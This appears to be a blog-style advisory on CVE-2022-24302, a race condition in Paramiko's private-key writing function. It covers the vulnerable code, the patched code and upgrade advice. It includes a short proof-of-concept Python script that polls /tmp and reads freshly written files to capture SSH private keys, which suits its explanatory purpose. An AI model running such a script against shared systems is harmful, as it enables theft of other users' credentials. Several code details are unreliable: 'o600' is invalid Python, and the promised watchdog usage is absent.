_CVE-2022-24302_ is a security vulnerability found in the widely-used Python SSH library, Paramiko, before version 2.10.1. If you're managing automated SSH sessions in Python, using this library puts you right in the impact zone. Today, we’ll dig deep into what this vulnerability is, see how it works, show code that triggers it, and offer practical advice on patching your systems.

What’s Paramiko?

Paramiko is a Python library that allows you to connect to remote servers using SSH, SFTP, SCP, and more. It's a crucial piece of the stack for sysadmins, DevOps engineers, and developers writing automation scripts.

What’s the Problem—In Plain English?

Inside Paramiko, there's a handy function called write_private_key_file. As the name says, it writes out a private SSH key to disk. Here's the issue: it tries to make the generated private key file readable only by the owner. But, due to a _race condition_, there’s a brief moment when another user on the same machine could read the private key before the permissions are set.

So, if your application writes private keys onto a shared filesystem (for example, in a multi-user server or CI/CD environment), someone else could peek at it _just at the right moment_.

Let's look at a simplified snippet of what happened in vulnerable versions of Paramiko

def write_private_key_file(filename, key_data):
    with open(filename, "w") as f:
        f.write(key_data)         # (1) Write the secret key to disk
    os.chmod(filename, o600)     # (2) Restrict permissions to owner only

The Sequence

1. The file is opened and written with default permissions (possibly world-readable, depending on your umask).
2. Only after writing, the script uses chmod to limit access (600 = user read/write only).

But here's the rub: between steps (1) and (2), there’s a brief window of time. On a busy system, a malicious process could quickly read the file before the permission change makes it exclusive.

How Can This Be Exploited?

An attacker with access to the same file system (think: a rogue user on a shared server) can set up a monitoring process to watch file creations or just continuously read newly created files in the relevant directory.

Here’s a conceptual *exploit* using Python's watchdog to catch the file just as it’s created

import os
import time

watched_dir = '/tmp'  # Or wherever private keys are written

def watch_for_keys():
    already_seen = set(os.listdir(watched_dir))
    while True:
        for fname in os.listdir(watched_dir):
            if fname not in already_seen:
                full_path = os.path.join(watched_dir, fname)
                # Try to read the file ASAP
                try:
                    with open(full_path, 'r') as f:
                        contents = f.read()
                        print(f"Snagged key from {fname}:")
                        print(contents[:100])  # Just printing first few chars
                except Exception as e:
                    pass
                already_seen.add(fname)
        time.sleep(.05)

if __name__ == '__main__':
    watch_for_keys()

If you run this script while another process is generating SSH private keys with old Paramiko, you might 'catch' the unprotected file.

When Does This Matter?

This isn't always a risk. If you’re running your script on your own computer, alone, chances are low. You’re at risk if:
- Code writes private keys to a shared or world-writable directory (like /tmp)

Multiple users have access to the machine

- The filesystem is fast enough and/or an attacker can monitor it

How Did Paramiko Fix This?

The fix (landed in Paramiko 2.10.1) is simple: do the chmod before writing, or open the file with the correct permissions from the start.

Here’s how the function should be written (simplified)

import os

def write_private_key_file(filename, key_data):
    # Create the file with secure permissions right away
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC
    mode = o600  # Only the user can read/write
    with os.fdopen(os.open(filename, flags, mode), "w") as f:
        f.write(key_data)

This way, the file is _never_ accessible with wide-open permissions, removing the race window.

pip install --upgrade paramiko

- Audit Your Code: If you forked or copied the write_private_key_file function, patch it as shown above.

References and Further Reading

- Paramiko Security Release Notes 2.10.1
- NVD Entry for CVE-2022-24302
- GitHub Issue/PR fixing the bug

TL;DR

_CVE-2022-24302_ in Paramiko before 2.10.1 is a classic example of a race condition. If you generate private SSH keys in shared environments, update now, or your secrets might leak.  
Always be careful with file permission handling, especially with sensitive data.

Timeline

Published on: 03/17/2022 22:15:00 UTC
Last modified on: 05/23/2022 22:01:00 UTC